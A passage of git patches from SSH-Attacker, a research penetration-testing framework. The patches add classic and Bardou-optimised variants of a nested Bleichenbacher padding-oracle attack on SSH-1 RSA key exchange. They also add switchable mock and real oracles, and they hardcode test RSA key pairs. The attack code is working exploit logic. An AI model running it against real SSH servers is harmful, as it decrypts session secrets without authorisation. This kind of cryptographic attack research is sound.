"CC8E8480EB2E26580EA260146575CB10D215F71A46BBB62C98D854154579E372E193102FF359799C4D247A661F32C082EE5C1919B43889214C8310E6291E2B0B16818464BAE5A0374CACA0EB4814756B71C3E1F459AB4B8DE555D338CA30557F", - 16));*/ - - // Host 2048 - CustomRsaPrivateKey hostPrivatKey = - new CustomRsaPrivateKey( - new BigInteger( - "7AAB5898AEE7C451A2A90B9DE04EC947656FAB69460FF68E1E278EA1841D" - + "A22B39CA4A4FA7CEA1B8EDCB7224C38A1659D1226D2E07AF9A7C62A305AC" - + "9DEC042FBC290443B23E24C64765DE1AD58777A522BF102B1BCC5536D794" - + "62BCBE6DB8E91CD9CF6F98F62E5031BFAA9E51C93ED900579A39C26CBB64" - + "CF7E6F998513E20B4B2A4DD36D4F6F074A0FDB04232FA6EDAB89A1B32BA5" - + "2214696BDA66C4518A73F92807DD088AB11263519885A0CD6A42B6D9EAE9" - + "EBD13241EDC4EB7205AE838A5EF7AE280D36410057B38ED05CEBA75F92AC" - + "DF40226164BB3A0C4312B65A8C2FBA85CDB7CC5F77F53C45F64409AFC460" - + "210C8EE4DAB818F009172387ED00E141", - 16), - new BigInteger( - "00D9F6BFFAB8BC79C6E9AB6C3D4593F561CC93B41A70B9A750045ED0AC09" - + "6EF4A6A8C7B2AAA4F44459481319AE956934BF9D5C5AD7C004ADE0B81E43" - + "75FD1DF8797DF6F3CA130ED8A2A9B6E94467A05D97A0F8380A4CBB75FC5E" - + "5C303433B61750063D3801D5C90658ACAEE140B09F95A0FD8886EFAE16EA" - + "B779DF82E6A12C1BE011FECB417C788B72C42948AB54CCE1E8119CFB78E1" - + "3B06090CEBF6D3806854FE09F03B20BA92505058EC64C44F0B4DA0BAE71D" - + "52EDA11AB67F4B54D9FCEFE1FACEB520D595FFA33502FB91423EBD972F26" - + "150715CB0E648F715E6E5E8FC9D8FA55E9DE0652CF85D7928B235486F54A" - + "3F3EE64B04888B898864B08200A9E22909", - 16)); - CustomRsaPublicKey hostPublicKey = - new CustomRsaPublicKey( - new BigInteger("010001", 16), - new BigInteger( - "00D9F6BFFAB8BC79C6E9AB6C3D4593F561CC93B41A70B9A750045ED0AC09" - + "6EF4A6A8C7B2AAA4F44459481319AE956934BF9D5C5AD7C004ADE0B81E43" - + "75FD1DF8797DF6F3CA130ED8A2A9B6E94467A05D97A0F8380A4CBB75FC5E" - + "5C303433B61750063D3801D5C90658ACAEE140B09F95A0FD8886EFAE16EA" - + "B779DF82E6A12C1BE011FECB417C788B72C42948AB54CCE1E8119CFB78E1" - + "3B06090CEBF6D3806854FE09F03B20BA92505058EC64C44F0B4DA0BAE71D" - + "52EDA11AB67F4B54D9FCEFE1FACEB520D595FFA33502FB91423EBD972F26" - + "150715CB0E648F715E6E5E8FC9D8FA55E9DE0652CF85D7928B235486F54A" - + "3F3EE64B04888B898864B08200A9E22909", - 16)); - // Server 1024 - CustomRsaPrivateKey serverPrivateKey = - new CustomRsaPrivateKey( - new BigInteger( - "64F3D28624C63EC5E0A9751FDC4B2D" - + "ADC715F0DDA9D49EF91B4C5AA03483" - + "570BA8AA01151B704335A3219E7D22" - + "2FDB9777DA68F8DF8B5CDB5DB9B0C3" - + "99CF0334044E6ED09B40E754809429" - + "F6C387B7AC7BA00ECFE7AFE4D41499" - + "B2F341FBB0496C52CBE5EB1F7E64F4" - + "BF21F72B64EE0B478EAB6A0008E07A" - + "E2F52960703D0EB9", - 16), - new BigInteger( - "00C25E6978A2B8FE2C6228024BD5D0" - + "F3239DDDDECCDF156AEF9D3F7F56AF" - + "8443C510A03C66779363C33082D04D" - + "23648B308AE0BE07A1451C8BFF0B97" - + "DCA43E5703D66B8C04BF46DDBC79A7" - + "7228179E5B246433098BF8271CCE66" - + "C5E4CB3A9E2ECEE52BB07C33F92893" - + "A5D5B6F163BE6FBC1E8E66E4666866" - + "871890105EFFE1193F", - 16)); - CustomRsaPublicKey serverPublicKey = - new CustomRsaPublicKey( - new BigInteger("010001", 16), - new BigInteger( - "00C25E6978A2B8FE2C6228024BD5D0" - + "F3239DDDDECCDF156AEF9D3F7F56AF" - + "8443C510A03C66779363C33082D04D" - + "23648B308AE0BE07A1451C8BFF0B97" - + "DCA43E5703D66B8C04BF46DDBC79A7" - + "7228179E5B246433098BF8271CCE66" - + "C5E4CB3A9E2ECEE52BB07C33F92893" - + "A5D5B6F163BE6FBC1E8E66E4666866" - + "871890105EFFE1193F", - 16)); - - /*// Host 1024 - CustomRsaPublicKey hostPublicKey = - new CustomRsaPublicKey( - new BigInteger("010001", 16), - new BigInteger( - "00C6D5D18B3BDCA91AE922941730D7" - + "BFF6F959CACC67609C571CA281148B" - + "97F8CA742B85E9FABAF308E6BFED40" - + "06B639159E19CCCD3FFF4374E905B3" - + "D4FEE6B3F8867940FDAD622FF59E7E" - + "8E7801C29D5BEB6004E1F127C1B37B" - + "5BEDFF057F06FB133A21DA77B2B9FA" - + "9E4CF72740F0049B30DC1CE23EB2B7" - + "E6E92B129E1EFE67E3", - 16)); - CustomRsaPrivateKey hostPrivatKey = - new CustomRsaPrivateKey( - new BigInteger( - "0092FAA9AC0FB31CBA0CCE07C460D1" - + "8B5088A02C7E0E88E6E8A9FD2207CA" - + "ECAAF7150ABB31EBAAD84EA32C0AB7" - + "C27E5F1230CD878BCD9BE7047BE040" - + "3FD9B13624D9C822AB17C96615BB5A" - + "875D1A076D282B2E9035FAC37DB066" - + "82C8498BA624C77B0E1E2ECBE7AB5A" - + "5A0342E20C54482D149A7F37F8EF4A" - + "2C148CD3ADD6782189", - 16), - new BigInteger( - "00C6D5D18B3BDCA91AE922941730D7" - + "BFF6F959CACC67609C571CA281148B" - + "97F8CA742B85E9FABAF308E6BFED40" - + "06B639159E19CCCD3FFF4374E905B3" - + "D4FEE6B3F8867940FDAD622FF59E7E" - + "8E7801C29D5BEB6004E1F127C1B37B" - + "5BEDFF057F06FB133A21DA77B2B9FA" - + "9E4CF72740F0049B30DC1CE23EB2B7" - + "E6E92B129E1EFE67E3", - 16)); - // Server 768 Bit - CustomRsaPublicKey serverPublicKey = - new CustomRsaPublicKey( - new BigInteger("010001", 16), - new BigInteger( - "00CB2C65943BB603C0072D4C5AFD8B" - + "C5155D57231F02D191A079A3758BCF" - + "96E83318F0729D05437B543088D8A1" - + "73675EE40E7506EFB09EDD62C868C5" - + "27DB0768AB643AD09A7C42C6AD47DA" - + "ACE6CD53C051E26E69AF472D0CFE17" - + "322EC96499E529", - 16)); - CustomRsaPrivateKey serverPrivateKey = - new CustomRsaPrivateKey( - new BigInteger( - "00B30F82CADCC13296E7FC5D420819" - + "49EDE560A99C68208906F48D4248A1" - + "00EFCE30D9A1398FED04619390D7D3" - + "9AE0ECB7DFB6A5EC8CA6A491097680" - + "9280CB64AF1F8C8B67739CF7093B34" - + "4343419647B331CD9827953279BE6C" - + "AC31C55BA6EF01", - 16), - new BigInteger( - "00CB2C65943BB603C0072D4C5AFD8B" - + "C5155D57231F02D191A079A3758BCF" - + "96E83318F0729D05437B543088D8A1" - + "73675EE40E7506EFB09EDD62C868C5" - + "27DB0768AB643AD09A7C42C6AD47DA" - + "ACE6CD53C051E26E69AF472D0CFE17" - + "322EC96499E529", - 16));*/ - /*if (!isVulnerable()) { LOGGER.warn("The server is not vulnerable to Manger's attack"); return; }*/ - /* getPublicKeys(); - getHostPublicKey(); - getServerPublicKey();*/ + if (oracleType.equals(OracleType.REAL)) { + getPublicKeys(); + getHostPublicKey(); + getServerPublicKey(); + } else { + switch (keyLenght) { + case SHORT: + serverPrivateKey = this.serverPrivateKey768; + serverPublicKey = this.serverPublicKey768; + hostPrivatKey = this.hostPrivatKey1024; + hostPublicKey = this.hostPublicKey1024; + break; + case LONG: + serverPrivateKey = this.serverPrivateKey1024; + serverPublicKey = this.serverPublicKey1024; + hostPrivatKey = this.hostPrivatKey2048; + hostPublicKey = this.hostPublicKey2048; + break; + default: + LOGGER.fatal( + "Error - you need to choose a valid Keylenght if oracle-Type is not 'real'"); + throw new RuntimeException(); + } + } + byte[] encryptedSecret; if (config.isBenchmark()) { LOGGER.info("Running in Benchmark Mode, generating encrypted Session Key"); @@ -431,29 +461,37 @@ public void executeAttack() { throw new RuntimeException(e); } - Ssh1MockOracle oracle = null; - try { + // Create correct Oracle + Pkcs1Oracle oracle; + if (oracleType.equals(OracleType.REAL)) { oracle = - new Ssh1MockOracle( - hostPublicKey, hostPrivatKey, serverPublicKey, serverPrivateKey); - } catch (NoSuchPaddingException | NoSuchAlgorithmException | InvalidKeyException e) { - throw new RuntimeException(e); + new BleichenbacherOracle( + this.hostPublicKey, + this.serverPublicKey, + getSshConfig(), + counterInnerBleichenbacher, + counterOuterBleichenbacher); + } else { + try { + oracle = + new Ssh1MockOracle( + hostPublicKey, + hostPrivatKey, + serverPublicKey, + serverPrivateKey, + oracleType); + } catch (NoSuchPaddingException | NoSuchAlgorithmException | InvalidKeyException e) { + throw new RuntimeException(e); + } } - /* BleichenbacherOracle oracle = - new BleichenbacherOracle( - this.hostPublicKey, - this.serverPublicKey, - getSshConfig(), - counterInnerBleichenbacher, - counterOuterBleichenbacher);*/ Bleichenbacher attacker = new Bleichenbacher(encryptedSecret, oracle, hostPublicKey, serverPublicKey); long start = System.currentTimeMillis(); LOGGER.info("Encrypted Secret: {}", ArrayConverter.bytesToHexString(encryptedSecret)); - attacker.attack(); + attacker.attack(config.isClassic()); long finish = System.currentTimeMillis(); long timeElapsed = finish - start; @@ -477,6 +515,10 @@ public void executeAttack() { } } + String attackType = "bardou"; + if (config.isClassic()) + attackType="classic"; + if (config.isBenchmark()) { try { String str = @@ -489,7 +531,8 @@ public void executeAttack() { + " \"Outer-Tries\": \"%d\"," + " \"serverkey_lenght\": \"%d\"," + " \"hostkey_lenght\": \"%d\"," - + " \"oracle_type\": \"weaks\"" + + " \"oracle_type\": \"%s\"," + + " \"attack_type\": \"%s\"" + "}", ArrayConverter.bytesToHexString(solutionByteArray), ArrayConverter.bytesToHexString(encryptedSecret), @@ -497,7 +540,9 @@ public void executeAttack() { attacker.getCounterInnerBleichenbacher(), attacker.getCounterOuterBleichenbacher(), serverPublicKey.getModulus().bitLength(), - hostPublicKey.getModulus().bitLength()); + hostPublicKey.getModulus().bitLength(), + oracleType.toString(), + attackType); File output_File = new File("benchmark_results.txt"); FileOutputStream outputStream = new FileOutputStream(output_File, true); byte[] strToBytes = str.getBytes(); diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java index abacf7cb4..802ac15ae 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java @@ -436,18 +436,20 @@ private List updateInterval( } /** The function to start the Attack */ - public void attack() { + public void attack(boolean classic) { if (hostPublicKey.getModulus().bitLength() > serverPublicKey.getModulus().bitLength()) { byte[] cracked = - nestedBleichenbacher(encryptedMsg, this.serverPublicKey, this.hostPublicKey); + nestedBleichenbacher( + encryptedMsg, this.serverPublicKey, this.hostPublicKey, classic); LOGGER.info("Cracked encoded: {}", ArrayConverter.bytesToHexString(cracked)); byte[] cracked_decoded = pkcs1Decode(cracked); LOGGER.info("Cracked decoded: {}", ArrayConverter.bytesToHexString(cracked_decoded)); solution = new BigInteger(cracked_decoded); } else { byte[] cracked = - nestedBleichenbacher(encryptedMsg, this.serverPublicKey, this.hostPublicKey); + nestedBleichenbacher( + encryptedMsg, this.serverPublicKey, this.hostPublicKey, classic); LOGGER.info("Cracked encoded: {}", ArrayConverter.bytesToHexString(cracked)); byte[] cracked_decoded = pkcs1Decode(cracked); LOGGER.info("Cracked decoded: {}", ArrayConverter.bytesToHexString(cracked_decoded)); @@ -467,7 +469,8 @@ public void attack() { private byte[] nestedBleichenbacher( byte[] ciphertext, CustomRsaPublicKey innerPublicKey, - CustomRsaPublicKey outerPublicKey) { + CustomRsaPublicKey outerPublicKey, + boolean classic) { int innerBitsize = innerPublicKey.getModulus().bitLength(); int outerBitsize = outerPublicKey.getModulus().bitLength(); int innerK = innerBitsize / 8; @@ -480,7 +483,7 @@ private byte[] nestedBleichenbacher( three_B_plus_one = three_B.add(BigInteger.ONE); // LOGGER.debug("Starting with outer BB {} ", ArrayConverter.bytesToHexString(ciphertext)); - byte[] encoded_inner_ciphertext = bleichenbacher(ciphertext, outerPublicKey); + byte[] encoded_inner_ciphertext = bleichenbacher(ciphertext, outerPublicKey, classic); // LOGGER.debug("got inner BB {}", ArrayConverter.bytesToHexString(ciphertext)); byte[] innerCiphertext = pkcs1Decode(encoded_inner_ciphertext); // LOGGER.debug("Decoded inner BB into {}", @@ -494,7 +497,7 @@ private byte[] nestedBleichenbacher( three_B_sub_one = three_B.subtract(BigInteger.ONE); three_B_plus_one = three_B.add(BigInteger.ONE); - return innerBleichenbacher(innerCiphertext, innerPublicKey, outerPublicKey); + return innerBleichenbacher(innerCiphertext, innerPublicKey, outerPublicKey, classic); } /** @@ -508,10 +511,12 @@ private byte[] nestedBleichenbacher( private byte[] innerBleichenbacher( byte[] ciphertext, CustomRsaPublicKey innerPublicKey, - CustomRsaPublicKey outerPublicKey) { + CustomRsaPublicKey outerPublicKey, + boolean classic) { int innerBitsize = innerPublicKey.getModulus().bitLength(); int innerK = innerBitsize / 8; + BigInteger s; LOGGER.debug( "bitsize: {}\nk: {}\nB: {}\n2B: {}\n3B: {}\n3B - 1: {}\nCiphertext: {}", @@ -529,91 +534,104 @@ private byte[] innerBleichenbacher( "M lower: {} M upper: {}", M.get(0).lower.toString(16), M.get(0).upper.toString(16)); - - ArrayList trimmers = new ArrayList<>(); - for (int t = 2; t <= Math.pow(2, 12) + 1; t++) { - if (t <= 50) { - for (int u = Math.floorDiv(2 * t, 3); u <= Math.floorDiv(3 * t, 2); u++) { - if (BigInteger.valueOf(u).gcd(BigInteger.valueOf(t)).equals(BigInteger.ONE)) { - trimmers.add(new int[] {u, t}); + if (!classic) { + ArrayList trimmers = new ArrayList<>(); + for (int t = 2; t <= Math.pow(2, 12) + 1; t++) { + if (t <= 50) { + for (int u = Math.floorDiv(2 * t, 3); u <= Math.floorDiv(3 * t, 2); u++) { + if (BigInteger.valueOf(u) + .gcd(BigInteger.valueOf(t)) + .equals(BigInteger.ONE)) { + trimmers.add(new int[] {u, t}); + } } + } else { // t > 50 + trimmers.add(new int[] {t - 1, t}); + trimmers.add(new int[] {t + 1, t}); } - } else { // t > 50 - trimmers.add(new int[] {t - 1, t}); - trimmers.add(new int[] {t + 1, t}); } - } - ArrayList utPairs = new ArrayList<>(); + ArrayList utPairs = new ArrayList<>(); - for (int[] ut : trimmers) { - int u = ut[0]; - int t = ut[1]; + for (int[] ut : trimmers) { + int u = ut[0]; + int t = ut[1]; - BigInteger uBI = BigInteger.valueOf(u); - BigInteger tBI = BigInteger.valueOf(t); + BigInteger uBI = BigInteger.valueOf(u); + BigInteger tBI = BigInteger.valueOf(t); - BigInteger cipherbig = new BigInteger(1, ciphertext); + BigInteger cipherbig = new BigInteger(1, ciphertext); - BigInteger result = - cipherbig - .multiply( - (uBI.multiply(tBI.modInverse(innerPublicKey.getModulus()))) - .modPow( - innerPublicKey.getPublicExponent(), - innerPublicKey.getModulus())) - .mod(innerPublicKey.getModulus()); + BigInteger result = + cipherbig + .multiply( + (uBI.multiply(tBI.modInverse(innerPublicKey.getModulus()))) + .modPow( + innerPublicKey.getPublicExponent(), + innerPublicKey.getModulus())) + .mod(innerPublicKey.getModulus()); - BigInteger encryptedAttempt = encryptBigInt(result, outerPublicKey); + BigInteger encryptedAttempt = encryptBigInt(result, outerPublicKey); - if (queryOracle( - encryptedAttempt, - true)) { // assuming the oracle and util method exists and does what expected - utPairs.add(new int[] {u, t}); + if (queryOracle( + encryptedAttempt, + true)) { // assuming the oracle and util method exists and does what + // expected + utPairs.add(new int[] {u, t}); + } } - } - if (!utPairs.isEmpty()) { + if (!utPairs.isEmpty()) { - ArrayList t_values = new ArrayList<>(); - for (int[] pair : utPairs) { - t_values.add(pair[1]); - } + ArrayList t_values = new ArrayList<>(); + for (int[] pair : utPairs) { + t_values.add(pair[1]); + } - int t_prime = lcm_n(t_values); + int t_prime = lcm_n(t_values); - int u_min = Integer.MAX_VALUE; - int u_max = Integer.MIN_VALUE; - for (int[] pair : utPairs) { - int current = pair[0] * t_prime / pair[1]; - if (current < u_min) { - u_min = current; - } - if (current > u_max) { - u_max = current; + int u_min = Integer.MAX_VALUE; + int u_max = Integer.MIN_VALUE; + for (int[] pair : utPairs) { + int current = pair[0] * t_prime / pair[1]; + if (current < u_min) { + u_min = current; + } + if (current > u_max) { + u_max = current; + } } + + BigInteger a = + two_B.multiply(BigInteger.valueOf(t_prime)) + .divide(BigInteger.valueOf(u_min)); + BigInteger b = + three_B_sub_one + .multiply(BigInteger.valueOf(t_prime)) + .divide(BigInteger.valueOf(u_max)); + + M = new ArrayList<>(); + M.add(new Interval(a, b)); + LOGGER.debug("done. trimming M0 iterations: [{},{}]", a, b); + } else { + LOGGER.debug("UT-Paris where empty"); } - BigInteger a = - two_B.multiply(BigInteger.valueOf(t_prime)).divide(BigInteger.valueOf(u_min)); - BigInteger b = - three_B_sub_one - .multiply(BigInteger.valueOf(t_prime)) - .divide(BigInteger.valueOf(u_max)); + s = + find_smallest_s_nested( + ceil(innerPublicKey.getModulus().add(two_B), M.get(0).lower), + ciphertext, + innerPublicKey, + outerPublicKey); - M = new ArrayList<>(); - M.add(new Interval(a, b)); - LOGGER.debug("done. trimming M0 iterations: [{},{}]", a, b); } else { - LOGGER.debug("UT-Paris where empty"); + s = + find_smallest_s_nested( + ceil(innerPublicKey.getModulus(), three_B), + ciphertext, + innerPublicKey, + outerPublicKey); } - BigInteger s = - find_smallest_s_nested( - ceil(innerPublicKey.getModulus().add(two_B), M.get(0).lower), - ciphertext, - innerPublicKey, - outerPublicKey); - LOGGER.debug( "found s, initial updating M lower: {} M upper: {}", M.get(0).lower.toString(16), @@ -676,7 +694,8 @@ public static int lcm_n(ArrayList list) { * @param publicKey The known public key, which was used to encrypt the ciphertext * @return the decrypted ciphertext, whith a valid PKCS#1 Padding */ - private byte[] bleichenbacher(byte[] ciphertext, CustomRsaPublicKey publicKey) { + private byte[] bleichenbacher( + byte[] ciphertext, CustomRsaPublicKey publicKey, boolean classic) { int bitsize = publicKey.getModulus().bitLength(); int k = bitsize / 8; @@ -697,87 +716,100 @@ private byte[] bleichenbacher(byte[] ciphertext, CustomRsaPublicKey publicKey) { M.get(0).lower.toString(16), M.get(0).upper.toString(16)); - ArrayList trimmers = new ArrayList<>(); - for (int t = 2; t <= Math.pow(2, 12) + 1; t++) { - if (t <= 50) { - for (int u = Math.floorDiv(2 * t, 3); u <= Math.floorDiv(3 * t, 2); u++) { - if (BigInteger.valueOf(u).gcd(BigInteger.valueOf(t)).equals(BigInteger.ONE)) { - trimmers.add(new int[] {u, t}); + BigInteger s; + + if (!classic) { + ArrayList trimmers = new ArrayList<>(); + for (int t = 2; t <= Math.pow(2, 12) + 1; t++) { + if (t <= 50) { + for (int u = Math.floorDiv(2 * t, 3); u <= Math.floorDiv(3 * t, 2); u++) { + if (BigInteger.valueOf(u) + .gcd(BigInteger.valueOf(t)) + .equals(BigInteger.ONE)) { + trimmers.add(new int[] {u, t}); + } } + } else { // t > 50 + trimmers.add(new int[] {t - 1, t}); + trimmers.add(new int[] {t + 1, t}); } - } else { // t > 50 - trimmers.add(new int[] {t - 1, t}); - trimmers.add(new int[] {t + 1, t}); } - } - ArrayList utPairs = new ArrayList<>(); - - for (int[] ut : trimmers) { - int u = ut[0]; - int t = ut[1]; - - BigInteger uBI = BigInteger.valueOf(u); - BigInteger tBI = BigInteger.valueOf(t); - - BigInteger cipherbig = new BigInteger(1, ciphertext); - - BigInteger result = - cipherbig - .multiply( - (uBI.multiply(tBI.modInverse(publicKey.getModulus()))) - .modPow( - publicKey.getPublicExponent(), - publicKey.getModulus())) - .mod(publicKey.getModulus()); - - if (queryOracle( - result, - false)) { // assuming the oracle and util method exists and does what expected - utPairs.add(new int[] {u, t}); + ArrayList utPairs = new ArrayList<>(); + + for (int[] ut : trimmers) { + int u = ut[0]; + int t = ut[1]; + + BigInteger uBI = BigInteger.valueOf(u); + BigInteger tBI = BigInteger.valueOf(t); + + BigInteger cipherbig = new BigInteger(1, ciphertext); + + BigInteger result = + cipherbig + .multiply( + (uBI.multiply(tBI.modInverse(publicKey.getModulus()))) + .modPow( + publicKey.getPublicExponent(), + publicKey.getModulus())) + .mod(publicKey.getModulus()); + + if (queryOracle( + result, + false)) { // assuming the oracle and util method exists and does what + // expected + utPairs.add(new int[] {u, t}); + } } - } - if (!utPairs.isEmpty()) { + if (!utPairs.isEmpty()) { - ArrayList t_values = new ArrayList<>(); - for (int[] pair : utPairs) { - t_values.add(pair[1]); - } + ArrayList t_values = new ArrayList<>(); + for (int[] pair : utPairs) { + t_values.add(pair[1]); + } - int t_prime = lcm_n(t_values); + int t_prime = lcm_n(t_values); - int u_min = Integer.MAX_VALUE; - int u_max = Integer.MIN_VALUE; - for (int[] pair : utPairs) { - int current = pair[0] * t_prime / pair[1]; - if (current < u_min) { - u_min = current; - } - if (current > u_max) { - u_max = current; + int u_min = Integer.MAX_VALUE; + int u_max = Integer.MIN_VALUE; + for (int[] pair : utPairs) { + int current = pair[0] * t_prime / pair[1]; + if (current < u_min) { + u_min = current; + } + if (current > u_max) { + u_max = current; + } } + + BigInteger a = + two_B.multiply(BigInteger.valueOf(t_prime)) + .divide(BigInteger.valueOf(u_min)); + BigInteger b = + three_B_sub_one + .multiply(BigInteger.valueOf(t_prime)) + .divide(BigInteger.valueOf(u_max)); + + M = new ArrayList<>(); + M.add(new Interval(a, b)); + LOGGER.debug("done. trimming M0 iterations: [{},{}]", a, b); + } else { + LOGGER.debug("UT-Paris where empty"); } - BigInteger a = - two_B.multiply(BigInteger.valueOf(t_prime)).divide(BigInteger.valueOf(u_min)); - BigInteger b = - three_B_sub_one - .multiply(BigInteger.valueOf(t_prime)) - .divide(BigInteger.valueOf(u_max)); + // Search for s1 with improved start-conditions from Bardou + s = + find_smallest_s( + ceil(publicKey.getModulus().add(two_B), M.get(0).lower), + ciphertext, + publicKey); - M = new ArrayList<>(); - M.add(new Interval(a, b)); - LOGGER.debug("done. trimming M0 iterations: [{},{}]", a, b); } else { - LOGGER.debug("UT-Paris where empty"); + // do the regular search for s1 as described in the original paper + s = find_smallest_s(ceil(publicKey.getModulus(), three_B), ciphertext, publicKey); } - BigInteger s = - find_smallest_s( - ceil(publicKey.getModulus().add(two_B), M.get(0).lower), - ciphertext, - publicKey); - LOGGER.debug( "found s, initial updating M lower: {} M upper: {}", M.get(0).lower.toString(16), diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/KeyLenght.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/KeyLenght.java new file mode 100644 index 000000000..632556989 --- /dev/null +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/KeyLenght.java @@ -0,0 +1,14 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2024 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.attacks.pkcs1; + +public enum KeyLenght { + SHORT, + LONG, + REAL +} diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/OracleType.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/OracleType.java new file mode 100644 index 000000000..a4e2ebfea --- /dev/null +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/OracleType.java @@ -0,0 +1,24 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2024 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.attacks.pkcs1; + +public enum OracleType { + WEAK("weak"), + STRONG("strong"), + REAL("real"); + final String oracleType; + + OracleType(String name) { + this.oracleType = name; + } + + @Override + public String toString() { + return oracleType; + } +} diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java index 43447e261..c525cfcae 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java @@ -9,6 +9,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.attacks.pkcs1.OracleException; +import de.rub.nds.sshattacker.attacks.pkcs1.OracleType; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; import de.rub.nds.tlsattacker.util.MathHelper; @@ -40,18 +41,21 @@ public class Ssh1MockOracle extends Pkcs1Oracle { private final RSAPublicKey hostPublicKey; private final RSAPublicKey serverPublicKey; private final Cipher cipher; + OracleType oracleType; public Ssh1MockOracle( CustomRsaPublicKey hostPublicKey, CustomRsaPrivateKey hostPrivateKey, CustomRsaPublicKey serverPublicKey, - CustomRsaPrivateKey serverPrivateKey) + CustomRsaPrivateKey serverPrivateKey, + OracleType oracleType) throws NoSuchPaddingException, NoSuchAlgorithmException, InvalidKeyException { this.hostPublicKey = hostPublicKey; this.hostPrivateKey = hostPrivateKey; this.serverPublicKey = serverPublicKey; this.serverPrivateKey = serverPrivateKey; this.blockSize = MathHelper.intCeilDiv(hostPublicKey.getModulus().bitLength(), Byte.SIZE); + this.oracleType = oracleType; // Init cipher this.cipher = Cipher.getInstance("RSA/ECB/PKCS1Padding"); @@ -211,8 +215,13 @@ private boolean[] oracleWeak(byte[] msg) { */ @Override public boolean[] checkDoublePKCSConformity(byte[] msg) { - return oracleWeak(msg); - // return oracleStrong(msg); + if (oracleType.equals(OracleType.WEAK)) { + return oracleWeak(msg); + } else if (oracleType.equals(OracleType.STRONG)) { + return oracleStrong(msg); + } else { + return new boolean[] {false, false}; + } } private byte[] fillUpArray(int lenght, byte[] inputArray) { From 4cb7527daa4258e326e579aeefe46bb91cc1fd8f Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sat, 13 Jan 2024 00:06:22 +0100 Subject: [PATCH 126/176] Adding and correcting Improvements from Bardou 2012 --- .../attacks/impl/BleichenbacherAttacker.java | 3 +- .../attacks/pkcs1/Bleichenbacher.java | 633 ++++++------------ .../attacks/pkcs1/util/MathHelper.java | 81 +++ 3 files changed, 300 insertions(+), 417 deletions(-) create mode 100644 Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/util/MathHelper.java diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java index 0111caba8..241b1c026 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java @@ -516,8 +516,7 @@ public void executeAttack() { } String attackType = "bardou"; - if (config.isClassic()) - attackType="classic"; + if (config.isClassic()) attackType = "classic"; if (config.isBenchmark()) { try { diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java index 802ac15ae..46ae6ac72 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java @@ -9,6 +9,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.attacks.pkcs1.oracles.Pkcs1Oracle; +import de.rub.nds.sshattacker.attacks.pkcs1.util.MathHelper; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; import java.math.BigInteger; import java.security.InvalidKeyException; @@ -16,8 +17,6 @@ import java.util.ArrayList; import java.util.Arrays; import java.util.List; -import java.util.stream.Collectors; -import java.util.stream.IntStream; import javax.crypto.BadPaddingException; import javax.crypto.Cipher; import javax.crypto.IllegalBlockSizeException; @@ -28,6 +27,7 @@ public class Bleichenbacher extends Pkcs1Attack { private static final Logger LOGGER = LogManager.getLogger(); + // private MathHelper mathHelper = new MathHelper(); CustomRsaPublicKey hostPublicKey; CustomRsaPublicKey serverPublicKey; @@ -65,26 +65,6 @@ public Bleichenbacher( * @param b The BigInteger number that is the divisor. * @return The floor division of a by b as a BigInteger. */ - private BigInteger floor(BigInteger a, BigInteger b) { - return a.divide(b); - } - - /** - * Divides a BigInteger number 'a' by another BigInteger number 'b' and returns the ceiling of - * the result. - * - * @param a The BigInteger number to be divided - * @param b The BigInteger number that is the divisor - * @return The ceiling of the division result - */ - private BigInteger ceil(BigInteger a, BigInteger b) { - BigInteger c = a.mod(b); - if (c.compareTo(BigInteger.ZERO) > 0) { - return a.divide(b).add(BigInteger.ONE); - } else { - return a.divide(b); - } - } /** * Manipulates the ciphertext by performing the following steps: 1. Computes the exponentiated @@ -116,44 +96,26 @@ private BigInteger manipulateCiphertext(BigInteger s, 